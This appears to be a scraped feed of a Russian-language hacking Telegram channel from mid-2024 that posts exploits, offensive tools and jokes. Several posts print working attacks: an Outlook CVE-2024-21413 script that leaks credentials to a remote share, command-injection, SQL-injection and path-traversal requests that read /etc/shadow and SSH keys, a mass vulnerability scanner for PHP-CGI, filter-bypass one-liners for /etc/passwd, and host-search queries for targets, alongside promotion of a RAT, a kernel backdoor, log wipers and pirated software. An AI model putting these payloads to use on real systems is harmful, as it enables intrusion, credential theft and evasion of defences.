WhatsApp extension manipulation*Что с телегой, что вацапом, это даже комментировать не хочется, когда юзер сам ставит APK и дает ему разрешения.Когда там последний zeroClick был, 2 года назад ? )*POC#FU |
|
2024-08-01 08:23:52 |
CVE-2024-7120 RAISECOM Gateway Devices*WriteUp*Exploit command injectioncurl 'http://<TARGET_IP>/vpn/list_base_config.php?type=mod&parts=base_config&template=`<INJECTED_SHELL_COMMAND>`' \ -H 'Accept: */*' \ -H 'Accept-Encoding: gzip, deflate' \ -H 'Connection: keep-alive' |
Images
|
2024-07-31 19:34:23 |
Прекрасное 🤣#nightHumor |
Images
|
2024-07-31 05:40:25 |
TuDoor*Только не королевская династия, я скорее династия DNS.В общем к сути, собралась как то в Окледе (богоспасаемые штаты) группа хитрых азиатов.Слово за слово, все скатилось к перечитыванию RFC и трудов Дэна Камински (мир праху его), основной тезис которого как известно гласит, пойди и отрави DNS ближнего своего.Ну и как водится дочитались до дыр в BIND, PowerDNS и Microsoft DNS и всего сопутствующего.*Рекомендую к осмыслению саму страничку и линки внизу.Среда чюваки #DNS #DOS #cachepoison |
|
2024-07-30 20:36:46 |
#nightHumor |
Images
|
2024-07-30 05:20:05 |
CVE-2024-29849*Veeam - Bypass Authentication*Полный анализ и POC exploit#veeam #bypass |
|
2024-07-30 05:13:48 |
.NET PROFILER DLL LOADING*Эксплойт загружает вредоносную DLL с помощью планировщика задач (MMC) для обхода UAC и получения прав администратора. |
Images
|
2024-07-29 20:44:14 |
LoooL 👌https://guthib.com#humor |
|
2024-07-29 12:59:42 |
Binary Ninja 4.1 Final + crack*(Linux+windows+Mac версии)*magnet linkmagnet:?xt=urn:btih:c392c1aab1786180413167e3b8345f0f9d1fc8c4&dn=binja_release_6 |
Images
|
2024-07-29 12:11:40 |
2024-21413 /outlook RCE*POCimport smtplibfrom email.mime.multipart import MIMEMultipartfrom email.mime.text import MIMETextdef send_email(): # Get user input for sender's email address and password sender_email = input("Enter your Outlook email address: ") sender_password = input("Enter your Outlook email password: ") # Get user input for receiver's email address receiver_email = input("Enter the recipient's email address: ") # Create a new message object msg = MIMEMultipart() # Add sender, receiver, and subject to the message msg['From'] = sender_email msg['To'] = receiver_email msg['Subject'] = input("Enter email subject: ") # Ask user if they want to add a link attachment add_attachment = input("Do you want to add a link attachment? (yes/no): ").lower() if add_attachment == 'yes': html_content = """\ <!DOCTYPE html> <html lang="en"> <body> <p><a href="file:///\\192.168.206.139/test/Doc.txt!xssvideo">Salary docs</a></p> </body> </html>""" msg.attach(MIMEText(html_content, 'html')) # Connect to SMTP server and send email with smtplib.SMTP('smtp-mail.outlook.com', 587) as server: server.starttls() server.login(sender_email, sender_password) server.send_message(msg) print("Email sent successfully.")if __name__ == "__main__": send_email()Но есть пара НО:1. В строке 27 вам необходимо указать путь к файлу на вашем сервере (линк на rtf например)2. На линк жертве кликать не нужно, Office Protected View все сам сделает.3. Было мнение что нужно находиться в LAN жертвы, но как бы есть пара минут пока port established#outглюк #ntlm2 |
|
2024-07-28 09:55:14 |
Пишем stealer logs parser*WriteUp*SourceCode (template) |
Images
|
2024-07-28 04:35:32 |
Certified Ethical Hacker (CEH) v11*38 GB*download |
Images
|
2024-07-27 05:18:46 |
Malware Development*Part I - Analysis and DFIR SeriesPart II - Analysis and DFIR SeriesPart III - Analysis and DFIR SeriesPart IV - Analysis and DFIR Series#malware |
Images
|
2024-07-26 20:32:55 |
BreachForum Party !!!В программе:Канье Уэст и агенты FBIBugBounty с паяльникомРяженные cisco talosИ мерч в полоскуВы приходите😆#breachforum |
Images
|
2024-07-26 19:00:27 |
Xeno Rat*Опенсорсный РАТник, написан на C# и совместим с Windows 10, 11*Крыса умеет:HVNCLive Microphoneand cameraSocks5 Reverse ProxyRegular Updates and Much More (ну тут сомнительно)Built Completely from Scratch (скорее минус чем плюс)UAC bypass (хммм)Fun menu (праздник для души и мёд для ушей)ну и куча всегоdownload крысу#RAT #funny |
Images
|
2024-07-26 05:06:09 |
eBPF based kernel backdoor*Снифинг ssh/sudo/su/login/passwd сессий*download#ebpf #linux |
Images
|
2024-07-25 21:08:34 |
Поздравляем с днем системного администратора 2024*и смотрим классику 😏#sysadminDAY |
|
2024-07-25 11:48:52 |
Плащ невидимка для linux процессов*В программе:Аномальное монтированиеПустые каталоги в которых есть жизньЗаплывы с sTraceФорензика одной ладошкой*Я надеваю свой плащ и волшебную шляпу - Invisibility Cloak - Slash-Proc Magic#redteam #linux #proc |
Images
|
2024-07-24 18:57:04 |
Linux Shellcoding*Избегайте нулевых байтов \\x00 в шеллкодесах !!!*Щелкнуть орешек знаний тут#linux #redteam |
Images
|
2024-07-23 20:53:59 |
PumpBin*Собирайте offensive имплатны, шаблоны, подгружайте в свои C2\C&CНо помните, ровно в полночь - дадут бинарём в тыкву*Скачать тут*Документация тут🎃 |
Images
|
2024-07-23 15:36:27 |
CVE-2024-41107*Apache CloudStack *Версии с 4.5.0 по 4.18.2.1 и с 4.19.0.0 по 4.19.0.2.*Дырка в механизме аутентификации SAML*Для админов\white: saml2.enabled заменить на saml2.false бгг))#apache #saml |
|
2024-07-23 13:04:17 |
СVE-2024-39907CVSS 9.8 Ошибка SQLi подвергает пользователей 1Panel удаленному захвату*POC exploit*FOFA Query: icon_hash="1300107149" || icon_hash="1453309674" || http://cert.issuer.cn="1Panel Intermediate CA"FOFA Link: пыщь#1panel #china |
Images
|
2024-07-22 19:45:53 |
Meta LLaMA 3.1 Нейроночка*764GiB после распаковки~820GBmagnet:?xt=urn:btih:c0e342ae5677582f92c52d8019cc32e1f86f1d83&dn=miqu-2&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80* |
Images
|
2024-07-22 03:33:20 |
CVE-2024-40348*Bazaar < v1.4.3 обход каталога*POC+scanner* |
Images
|
2024-07-18 22:22:48 |
берегите котиков*#bilet |
|
2024-07-17 07:52:22 |
Havoc C2 Teamserver SSRF exploit *Exploit#CC #C2 #havoc #hackBYhack |
|
2024-07-17 07:37:03 |
ThinkPad Hardware hacking to bypass BIOS passwords*Read#hardware #bios |
Images
|
2024-07-16 18:42:05 |
IHxExec*POC для выполнения произвольного кода от имени другого пользователя*download |
Images
|
2024-07-16 16:04:26 |
CVE-2024-41003*Linux Kernel: Vulnerability in the eBPF verifier register limit tracking#kernel |
Images
|
2024-07-14 20:54:47 |
Viva España2:1Прекрасный матч !!! |
Images
|
2024-07-14 06:33:15 |
CVE-2024-29824*Ivanti EPM - Remote Code Execution*Mass exploit |
Images
|
2024-07-14 06:18:16 |
pdf exploit*Создать свой#CVE-2024-4367 #pdf |
|
2024-07-13 21:33:05 |
CVE-2024-34102*Adobe CommerceВерсии: 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8XXE vuln *Exploit |
Images
|
2024-07-13 05:15:50 |
Просыпаемся, завтракаем*CVE-2024-5522 WordPress HTML5 Video Player SQLi*usage:GET /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- - |
|
2024-07-12 20:13:03 |
Exploiting Enterprise Backup Software For Privilege Escalation*часть перваячасть вторая*#LPE #interprise #research |
Images
|
2024-07-12 08:25:31 |
По поводу youtube*Пошел проверять, 4К прекрасно гоняется без тормозов.Я и не сразу то понял почему 👌Ну если по офф версии на территории РФ стоит старое оборудование googleкоторое не обновляется, а трафф вырос.Что мешает обходиться это узкое место ? Ответ: ничего.Поставьте себе vpn (только не быдло wireguard и даже не православный openvpn, а что то современное, типа xtls). клиенты есть под любую платформу: unix/linux/windows/android/appleИ будет вам счастье.Бонус трэк: конспирологическая версияПодумалось, тут же наши выкатили аналог тытрубы - "Платформа", но нас уже палкой от youtube отгонишь, вот и зарезали траффик ))) |
Images
|
2024-07-12 05:30:36 |
CVE-2024-39202 D-Link DIR-823X*RCE*writeup*POC exploit |
Images
|
2024-07-11 17:05:32 |
Самый серьезный российский хакер bratva известный своими комментариями про киберпреступления(например LockBit ransomware: операция Cronos, его постили даже западные СМИ) поделился каналом про кибербезопасность который он читает с удовольствием:https://t.me/knightpentest |
Images
|
2024-07-11 11:59:50 |
MSSQL ATTACK TOOL - pentesting MSSQL servers*writeUP*download#tools #mssql |
Images
|
2024-07-10 11:58:03 |
СVE-2024-37081 VMware vCenter*Уязвимость в неправильной конфигурацией /etc/sudoers, позволяет сохранять опасные переменные среды при выполнении команд sudo.*POC exploit#vmware |
|
2024-07-10 09:43:35 |
CVE-2024-38094 / CVE-2024-38024 / CVE-2024-38023*Microsoft SharePoint RCE*VIDEO*POC exploit |
Images
|
2024-07-09 08:15:42 |
CVE-2024-5009 *Progress WhatsUp Gold SetAdminPassword Privilege Escalation*POC |
Images
|
2024-07-09 04:45:45 |
HEVD Exploit Windows 10 22H2 *LPE exploit |
|
2024-07-06 18:04:08 |
главное что быстро, однострочник*curl -s 'https://crt.sh/?q=cia.gov&output=json' --compressed -H 'User-Agent: Mozilla/5.0'|jq -r '.[].common_name,.[].name_value'|sort -u |
Images
|
2024-07-06 05:49:33 |
CVE-2024-36991*Splunk /etc/passwd*exploit |
Images
|
2024-07-05 14:53:06 |
CVE-2024-36401*RCE GeoServer *exploit |
Images
|
2024-07-05 14:47:35 |
1 миллион дорков*download |
Images
|
2024-07-04 23:08:23 |
eBPF rootkit memory forensics*link |
Images
|
2024-07-03 19:30:16 |
и блять чоидитеоткройтетем более что ее нет |
Images
|
2024-07-02 22:00:38 |
FreeBSD это вам не просто OS, это круто и стильно, а те кто вам говорит что там нет docker, просто не умеет в jail\зонирование и вот это вот все.Кто написал всем известный OpenSSH ? хакеры из OpenBSD ! Почему в BSD нет прогремевшей CVE-2024-6387 ? glib да, но может там стабильность любят )))*Не для кого не секрет, что доля рынка BSD, за последние 15 лет серьезно упала,*НО списывать рано.*Во славу систем журнал читать тутFreeBSD #OpenBSD #NetBSD #dragonFlyBSD #тычиBSD |
Images
|
2024-07-01 20:24:10 |
CVE-2024-28955 Automated Path Traversal & Local File Read*POC exploit#poc #path |
Images
|
2024-07-01 20:06:40 |
Подведем итоги нашего бесплатного курса "OSINT для новичков". В рамках курса были изучены фундаментальные основы поиска по открытым источникам (Open-Source Intelligence) и инструменты для автоматизации этого процесса. Также были рассмотрены специальные сервисы для сбора данных, часть из которых уже достаточно известна в кругах специалистов, а часть знакома лишь единицам и стремительно набирает популярность. Этот курс поможет вам понять важность защиты данных и конфиденциальности.Если вы что-то пропустили и желаете прочитать, то вот список пройденых материалов:Первая серия материалов - "Введение в OSINT": • Введение в OSINT • Стороны, заинтересованные в OSINT информации • Типы сбора информации • Преимущества и проблемы OSINT • Правовые и этические ограничения • Цифровой след • Google DorkingВторая серия материалов - "OSINT инструменты": • Хакерские поисковые системы. • OSINT на платформе Telegram. • OSINT: theHarvester и HaveIbeenPwned. • OSINT: Snoop, GHunt, ReconSpider. • OSINT: Поиск по фото. • Инструменты для OSINT в VKontakte и YouTube. • OSINT: Отслеживание транспортаНе забывайте делиться нашим бесплатным курсом "OSINT для новичков"!P.S.: Подборки полезных материалов, которые мы любезно собрали специально для вас: • OSINT подборка №1 • OSINT подборка №2 • OSINT подборка №3P.P.S.: Ещё немного полезного по теме OSINT: • OSINT collection. • Remini: Инструмент размытия/повышения резкости изображения может помочь получить лучший результат обратного поиска изображений и распознавания лиц. • Cleanup.Pictures: Один из лучших онлайн-инструментов для удаления фотообъектов, которые я когда-либо видел. • Как «пробить» человека в Интернете: используем операторы Google и логику • Red Team Trickery. • История одного наследства: как я с помощью OSINT и социальной инженерии заскамил скамера.Приватный клуб единомышленников, по всем вопросам вступления в клуб писать сюда.#OSINT #обучениеOSINT #статьяLH | Новости | Курсы | Мемы |
Images
|
2024-07-01 11:22:56 |
CVE-2024-6387: Критическая уязвимость OpenSSH без аутентификации RCE «regreSSHion»*Почитать* |
|
2024-06-29 05:49:18 |
Дожил. До всех |
Images
|
2024-06-28 12:30:51 |
CVE-2024-29943*Ошибка JIT Pwn2Own SpiderMonkey*POC exploit |
|
2024-06-23 13:17:07 |
+ |
|
2024-06-21 10:30:43 |
CVE-2024-30270*Дырка в почтовом сервере с открытым исходным кодом Mailcow.CVSS: 6,7Связана с обходом пути, затрагивая функцию rspamd_maps(), которая может привести к выполнению произвольных команд на сервере, позволяя злоумышленнику перезаписать любой файл.*exploit#mail |
Images
|
2024-06-21 05:22:47 |
CVE-2024-4577 PHP CGI Remote Code Execution *writeUPдля версий:PHP 8.3 < 8.3.8PHP 8.2 < 8.2.20PHP 8.1 < 8.1.29*POC#php #rce |
|
2024-06-21 04:46:03 |
CVE-2024-29973 Unauth inject Zyxel NAS*SHODAN: http.title:"Zyxel NAS326"FOFA: app="NAS542" || app="ZYXEL-NAS326"*exploit#nas #zyxel |
Images
|
2024-06-20 07:22:04 |
CVE 2024 0044*Дырка в Android 12 и 13. Уязвимость позволяет злоумышленнику выполнить атаку «запуск от имени любого приложения», что приводит к локальное повышение привилегий без вмешательства пользователя*exploit#android |
Images
|
2024-06-19 23:06:11 |
Gimmick*Section-based payload obfuscation technique for x64 *download |
Images
|
2024-06-19 17:16:10 |
Не ну, why not ?)я так понимаю docker RCECVSS Score: 146 % |
Images
Images
|
2024-06-19 17:07:44 |
CVE-2024-28397 js2py sandbox escape, bypass pyimport restriction*POC + fix#python #js #poc |
Images
|
2024-06-19 07:55:32 |
CVE-2024-34470 HSC MailInspector*POC:GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwdFOFA:title=="..:: HSC MailInspector ::.." |
Images
|
2024-06-18 08:41:20 |
Вчера на ночь глядя стукнула мысль, как бы реализовать редирект юзера в зависимости от правильно\неправильно был дан ответ на http basic authentication (который на nginx).Ну то есть если логин\пароль верный - отправило на правильный сайт.логин\пароль не верный - юзер ушел на страницу сбора данных (разрешение экрана, вебка и тд). ну или просто в лог писать.Добрый гугл сказать соединить nginx + LUA. После слова Lua я про первую мысль как то подзабыл.Варианта три:1 - собрать руками джинс + луа2 - докер3 - OpenRestyСам по себе Lua открывает тонну возможностей для хороших и не очень😝 целей.Как минимум можно получать webshell просто описав vhost (самый обычный nginx + пара строк на Lua) ну или получать полноценный lua cliОказвается нормальные пацаны уже сделали, гит ломится от решений.Почитайте короткую статейку )Backdooring OpenResty Servers#ЯбудуЗватьТебяЛУ #nginx |
Images
|
2024-06-18 08:05:46 |
BYPASScat ${HOME:0:1}etc${HOME:0:1}passwd`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwdcat `xxd -r -ps <(echo 2f6574632f706173737764)` |
Images
|
2024-06-18 06:45:12 |
How To Harden Active Directory To Prevent Cyber AttacksВебинарPDFНе поленитесь открыть PDF, можно даже не читать, картинки ТОП.#ad #sec |
Images
|
2024-06-17 15:18:58 |
None |
|
2024-06-17 15:18:57 |
CVE-2024-30078 win RCE wi-fi*New Wi-Fi Takeover Attack—All Windows Users*И Вроде сплоит какой то странный, но зачем тогда репу удалять ? ))#win #rce |
|
2024-06-07 17:35:40 |
DDOS для самых маленьких#pic |
|
2024-06-07 16:32:04 |
CVE-2024-4577 Argument Injection in PHP-CGIДОПОЛНЕНИЕ к предыдущему постуBASH:#!/bin/bash# Function to check vulnerability for a domaincheck_vulnerability() { local domain=$1 local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \ -H "User-Agent: curl/8.3.0" \ -H "Accept: */*" \ -H "Content-Length: 23" \ -H "Content-Type: application/x-www-form-urlencoded" \ -H "Connection: keep-alive" \ --data "<?php phpinfo(); ?>" \ --max-time 10) if [[ $response == *"PHP Version"* ]]; then echo "$domain: Vulnerable" fi}# Main function to iterate over domainsmain() { local file=$1 while IFS= read -r domain || [ -n "$domain" ]; do check_vulnerability "$domain" done < "$file"}# Check if the file argument is providedif [ "$#" -ne 1 ]; then echo "Usage: $0 <domain_list_file>" exit 1fi# Call the main function with the domain list filemain "$1"*Сохраняйте скрипт и по списку доменов:./CVE-2024-4577_script.sh /path/to/domains-list#php #xamp |
|
2024-06-07 08:14:16 |
CVE-2024-4577 Argument Injection in PHP-CGI*При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда PHP-CGI работает на платформе Windows и использует определенные кодовые страницы (упрощенный китайский 936, традиционный китайский 950, японский 932 и т. д.), атакующий может создавать вредоносные запросы для обхода исправления CVE-2012-1823. Это позволяет им выполнять произвольный код PHP без необходимости аутентификации.*fofa link (610,604 хостов)#php #xamp |
Images
|
2024-06-06 16:01:09 |
Proxy Bar pinned a photo |
|
2024-06-06 16:00:59 |
CVE-2024-27348 RCE в Apache HugeGraph Server*Usage:python3 CVE-2024-27348.py -t http://target.tld:8080 -c "command to execute"*POC exploit#apache #rce |
|
2024-06-06 15:57:25 |
CVE-2024-27822 macOS PackageKit*LPE*Для версий: macOS 14.5 Beta 1 (23F5049f) and older macOS 13.6.6 (22G630) and older macOS 12.7.4 (21H1123) and older Any version of macOS 11 or older*writeUp*exploit#macos #lpe |
|
2024-06-06 05:31:15 |
CVE-2024-36801 SemСms*sql injection для версии Semcms v 4.8*SQLi + POC |
Images
|
2024-06-05 15:32:23 |
Вышел PagedOut Июнь 2024*почитать PDF#ezine #hacking #tricks #coding |
Images
|
2024-06-05 11:11:42 |
Unlock Docker (Россия, Куба, Иран, Судан, Сирия, КимЧенЫновка)*BASH script*#dogger |
Images
|
2024-06-05 08:47:26 |
CVE-2024-5326 WordPress *Post Grid Gutenberg и плагин PostX = 4.1.2User Contributor включает регистрацию новых пользователей и устанавливает роль по умолчанию для новых пользователей — Администратор.*POC exploit#wordpress #exploit |
|
2024-06-04 04:57:22 |
CVE-2024-21512 MySQL2*Дырка в библиотеке MySQL для Node.js*POC#mysql |
Images
|
2024-05-31 21:31:38 |
Доброй ночи.Написал небольшую книжку\руководство для начинающих взломщиков Linux.Сей труд навеян вечным вопросом "Подскажите с чего начать?".На какую то уникальность не претендую, но надеюсь кому то окажется полезным.За вычитку благодарю uberhahnНу и с первым днем лета и днем защиты детей )Само руководство book.proxy-bar.org#book #linux #hex |
Images
|
2024-05-31 15:14:51 |
fuck yeah !*ansible-havoc*Bash cкрипты/ansible для развертывания Havoc на Linode и настройки и SSL*download#C2 #ansible |
Images
|
2024-05-30 11:42:02 |
CVE-2024-24919 Check Point Remote Access VPN 0-DayНу или так 👌aCSHELL/../../../../../../../home/admin/.ssh/id_rsa*ssh admin@Хостъ -i id_rsa#shitPointVPN #0Day |
Images
|
2024-05-30 08:23:00 |
CVE-2024-24919*Check Point Remote Access VPN 0-Day*FOFA link*POC:POST /clients/MyCRL HTTP/1.1Host: <redacted>Content-Length: 39aCSHELL/../../../../../../../etc/shadow#0day #checkpoint |
Images
|
2024-05-30 05:22:16 |
RWX_MEMEORY_HUNT_AND_INJECTION_DV*OneDrive.exe + API-интерфейс = шелл-код (без выделения новой области памяти RWX)*link |
|
2024-05-29 11:09:43 |
CVE-2024-27842 + CVE-2023-40404 macOS*Сплоит позволяет выполнять код на уровне ядра*POC exploit (для CVE-2024-27842)POC exploit (для CVE-2023-40404)#macos |
|
2024-05-27 19:10:32 |
CVE-2024-2961 - тихоходка 2*Переполнение буфера в glibc's iconv*Exploit + POC 👌#yammy |
|
2024-05-27 14:16:10 |
CVE-2024-2961 - тихоходка*Помните месяц назад был кипишь, относительно того что нашли дырку в glibc. Тогда многие хостеры еще напряглись. Но так как в широкий паблик ничего не уплыло, все успокоились.А ресёрчеры не успокоились, слишком вкусно пахло перспективным сплоитом.Ну так вот, на сцену вползает Iconv со своим RCE.*Сегодня вышел отличный WriteUp (первая часть из трёх), который раскрывает только часть потенциала дыры 2961*ЧитаемIconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine |
Images
|
2024-05-27 08:14:54 |
Linux Kernel Teaching. Laboratory*Большой и годный сборник лекций и лабораторных работ по ядру Linux. Лекции посвящены теоретическому исследованию ядра Linux.Лабораторки сделаны в стиле инструкций.Будет полезно: админам, драйверописателям и руткитоварам*Link#linux #kernel |
Images
|
2024-05-26 04:54:39 |
Образовательные мультики по воскресеньям !*Едим сырник, пьем кофе, смотрим мультики*Как работает нашумевший бэкдор XZUtils SSHD.#XZ #мультики |
|
2024-05-25 16:00:12 |
Трансмутация вредоносного ПО - Раскрытие скрытых следов кровавой алхимии.*Интересный writeup.Рассматривается анализ вредоносного ПО под названием «BloodAlchemy», которое наблюдали в ходе атаки.В октябре 2023 года BloodAlchemy была названа Elastic Security Lab 1 новым RATником. Однако расследование показало, что BloodAlchemy — это НЕ совершенно новая вредоносная программа, а развитая версия Deed RAT, преемника ShadowPad.*Link#malware #rat |
Images
|
2024-05-25 14:58:04 |
EDRaser*Тулза для удаленного удаления:журналов доступажурналов событий Windowsбаз данныхдругих файлов на удаленных компьютерах. два режима работы: автоматический и ручной.*link*Напримерpython edraser.py --attack windows_event_log --ip 192.168.1.133 |
|
2024-05-23 20:16:45 |
Фанатам крэкнутого BurpSuite Pro чутка напрячьсяв одной из сборок найдет стиллер#сыр800 |
Images
|
2024-05-23 19:38:00 |
Интересный способ отключить Windows Defender. (через API WSC)*NoDefender#win #defender |
Images
|
2024-05-23 10:37:49 |
Поиск, анализ и использование переполнения буфера стека в подсистеме netfilter из контекста softirq.*Часть 01Часть 02 #netfilter #linux |
Images
|
2024-05-23 05:32:45 |
CVE-2024-21683Confluence Data Center and Server RCE*POC - 3 вариата#Jirka |
Images
|
2024-05-21 13:08:59 |
Отличный WriteUpt по теме SIM Hijacking*Link#sim |
Images
|
2024-05-19 19:18:07 |
Интересный и подробный writeUp о том, как юзать уязвимость записи за пределами доступа в FortiGate SSL VPN.*Link |
Images
|
2024-05-19 17:07:31 |
CVE-2024-32002 GIT RCE*Удаленное выполнение кода в подмодулях Git.Payload может быть активирован через рекурсивное клонирование репозитория Git.*POC exploit#git #rce |
|
2024-05-19 06:04:55 |
Образовательные мультики по воскресеньям !Берем сырники, кофе, смотрим*Функции аутентификации в LSASS. Это дает атакующему главный пароль без изменения паролей пользователей.#мультики #LSASS |
|
2024-05-18 14:08:35 |
Подведем итоги нашего бесплатного курса "Linux для новичков". Курс был составлен из различных модулей, предназначенных для ознакомления с основными аспектами работы в операционной системе Linux. В рамках курса были изучены основы работы с файлами и директориями, управление пользователями и группами, сетевые возможности Linux, мониторинг, журналирование и проверка безопасности. Также были рассмотрены темы работы с данными и дисками в Linux, туннелирование трафика и полезные инструменты для взлома.Неделя 1: Введение в Linux • Что такое Linux и почему его выбирают? • Основные дистрибутивы Linux: Ubuntu, Fedora, CentOS и др. • Установка Linux: дуализм с Windows, LiveCD и виртуальные машины. • Основные команды командной строки Linux: cd, ls, mkdir, rm и др. • Структура файловой системы Linux: /bin, /etc, /home и др. • Пакетный менеджер APT для установки и обновления программ. • Основы текстового редактора nano: открытие, редактирование и сохранение файлов.Неделя 2: Работа с файлами и директориями • Основные команды для работы с файлами и директориями: cp, mv, rm и др. • Работа с архивами в Linux: создание, разархивирование, просмотр. • Поиск файлов и содержимого в Linux: команды find и grep. • Управление правами доступа к файлам и директориям в Linux: chmod и chown. • Символьные и жесткие ссылки: создание и использование. • Управление процессами и задачами в Linux: команды ps, top, kill и др. • Автоматическое выполнение задач с помощью cron.Неделя 3: Управление пользователями и группами • Создание и удаление пользователей в Linux: команды useradd и userdel. • Управление паролями пользователей: команда passwd. • Назначение пользователей в группы: команда usermod. • Создание и удаление групп в Linux: команды groupadd и groupdel. • Управление правами доступа к файлам и директориям для пользователей и групп. • Просмотр информации о пользователях и группах: команды id, whoami и др. • Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.Неделя 4: Сетевые возможности Linux • Конфигурация сети в Linux: настройка IP-адреса, маски подсети, шлюза. • Проверка сетевого подключения: команда ping. • Конфигурация сетевых интерфейсов: команды ifconfig и ip. • Работа с удаленными хостами через SSH: подключение, передача файлов. • Конфигурация DNS-сервера в Linux: файл /etc/resolv.conf. • Настройка файрвола в Linux: команда iptables. • Основы настройки и использования сетевых служб в Linux: FTP, Samba и др. • Основы настройки и использования сетевых служб в Linux: Apache.Неделя 5: Мониторинг, журналирование, проверка безопасности. • Лог файлы системы Linux • Как настроить центральный сервер ведения логов с помощью Rsyslog в Linux. • Анализ лог-файлов: команды grep, awk, sed. • Настройка системы мониторинга и аудита: утилиты auditd, nmon. • Система мониторинга Zabbix • Мониторинг сети с помощью tcpdump • Проверка безопасности системы с помощью LinPEASНеделя 6: Работа с данными и дисками в Linux • Использование утилиты rsync для синхронизации данных. • Основы языка сценариев Bash: переменные, условия, циклы. • Создание и выполнение сценариев Bash: утилита bash. • Работа с образами дисков: команды dd, ddrescue. • Восстановление данных с помощью LiveCD. • Создание и настройка RAID-массивов для защиты данных. • Дефрагментация диска LinuxНеделя7: Туннелирование трафика • Установка и настройка OpenVPN сервера на Ubuntu • Простая настройка WireGuard Linux. • Настройка Shadowsocks. • Pivoting: Chisel • SSH туннели • Проксирование трафика с помощью proxychains • Pivoting: Lugolo-ngНеделя 8: Полезные инструменты для взлома • nmap 1 часть • nmap 2 часть • nmap 3 часть • crackmapexec • metasploit • Burp Suite • sqlmapНе забывайте сохранить и поделиться нашим бесплатным курсом "Linux для новичков"!#Linux #обучениеlinux #статьипоLinuxLH | Новости | Курсы | Мемы |
|
2024-05-18 05:51:13 |
CVE-2024-22120 Zabbix Server *Time Based SQL Injection*Тех детали*exploit#zabbix |
Images
|
2024-05-18 03:53:08 |
CVE-2024-32640*detection & Exploitation SQLi in Mura/Masa CMS*POC exploit |
Images
|
2024-05-17 11:14:33 |
CVE-2024-27130* RCE on a vulnerable QNAP device.*POC exploit |
|
2024-05-17 07:36:29 |
CVE-2024-33551Уязвимость SQL inj, обнаруженная в 8theme XStore, платформе электронной коммерции, созданной на базе WordPress. Уязвимость позволяет команды SQL в базе данных.*POCPOST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1Host: example.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: keep-aliveUpgrade-Insecure-Requests: 1#wordpress #sql |
|
2024-05-16 03:49:49 |
CVE-2024-32113 Apache-OFBiz*POC для WINPOST /webtools/control/xmlrpc HTTP/1.1Host: vulnerable-host.comContent-Type: text/xml<?xml version="1.0"?><methodCall> <methodName>performCommand</methodName> <params> <param> <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value> </param> </params></methodCall>POC для *NIXPOST /webtools/control/xmlrpc HTTP/1.1Host: vulnerable-host.comContent-Type: text/xml<?xml version="1.0"?><methodCall> <methodName>example.createBlogPost</methodName> <params> <param> <value><string>../../../../../../etc/passwd</string></value> </param> </params></methodCall> |
|
2024-05-15 14:42:52 |
CVE-2024-22026 *Ivanti EPMM "MobileIron Core" *exploit |
Images
|
2024-05-15 04:15:58 |
CVE-2024-27804 уязвимости ядра iOS/macOS, которая приводит к выполнению произвольного кода с привилегиями ядра. *POC exploit#IOS #MAC #kernel |
Images
|
2024-05-14 21:00:58 |
cve-2024-27956*WordPress Auto Admin Account Creation and Reverse Shell.*Дырка в плагине wp-automatic для выполнения SQL-запросов.#wordpress |
|
2024-05-14 20:52:41 |
None |
|
2024-05-14 20:52:40 |
UAF of wasm memory buffer due to mismatch of cached memory in graph-builder-interface in function ReloadInstanceCacheIntoSsa.*POC + exploit + video |
|
2024-05-14 15:28:25 |
CVE-2024-29895 cacti*Command injection in cmd_realtime.php *fofa link* usage:http://localhost/cacti/cmd_realtime.php?1+1&&calc.exe+1+1+1#net |
Images
|
2024-05-10 17:56:54 |
И норм |
|
2024-05-10 17:56:40 |
None |
Images
|
2024-05-10 14:49:03 |
чобы съесть чтобы изжога прошла |
|
2024-05-10 14:47:49 |
это наверно лишнее |
|
2024-05-10 14:46:36 |
прикольно |
|
2024-05-10 14:46:27 |
прислали из прошлой жизни )))))) |
|
2024-05-10 14:46:02 |
ахуеть |
|
2024-05-09 20:41:21 |
Круто же |
|
2024-05-09 20:41:14 |
None |
Images
|
2024-05-09 05:03:03 |
VPN*Разбираем различные методы обнаружения IP-адресов VPN от таких провайдеров, как NordVPN или ExpressVPN. *Читаем ТУТ*Большой список VPN exit NODE#vpn #detect |
Images
|
2024-05-08 18:54:00 |
Тут и сказать то нечего, было )))Со звуком !#Old |
|
2024-05-08 09:46:31 |
Сдаем экзамен по Sliver C2 framework с легкостью бабочки ))*Lets go#sliver |
Images
|
2024-05-08 04:57:09 |
CVE-2024-26925 Linux LPE*Опять nf_tableskernel 6.5 - 6.9-rc3Эксплоит будет в паблике 24 маяА пока подробности тут#linux #lpe |
Images
|
2024-05-08 04:48:25 |
Инструмент для чтения контрольных вопросов и ответов.Это возможно с помощью SamQueryInformationUser(UserResetInformation).*ReadResetData.c #win |
Images
|
2024-05-07 14:11:59 |
Active Directory Hardening Series*Part 1 – Disabling NTLMv1Part 2 – Removing SMBv1Part 3 – Enforcing LDAP SigningPart 4 – Enforcing AES for Kerberos#AD |
Images
|
2024-05-06 20:18:22 |
спать #modesleep |
|
2024-05-06 17:10:02 |
Linksys routers POCs*CVE-2024-33788 - POC exploitCVE-2024-33789 - POC exploit |
|
2024-05-06 12:06:04 |
слишком жирно)))*http://164.68.102.223/* |
Images
|
2024-05-06 07:59:46 |
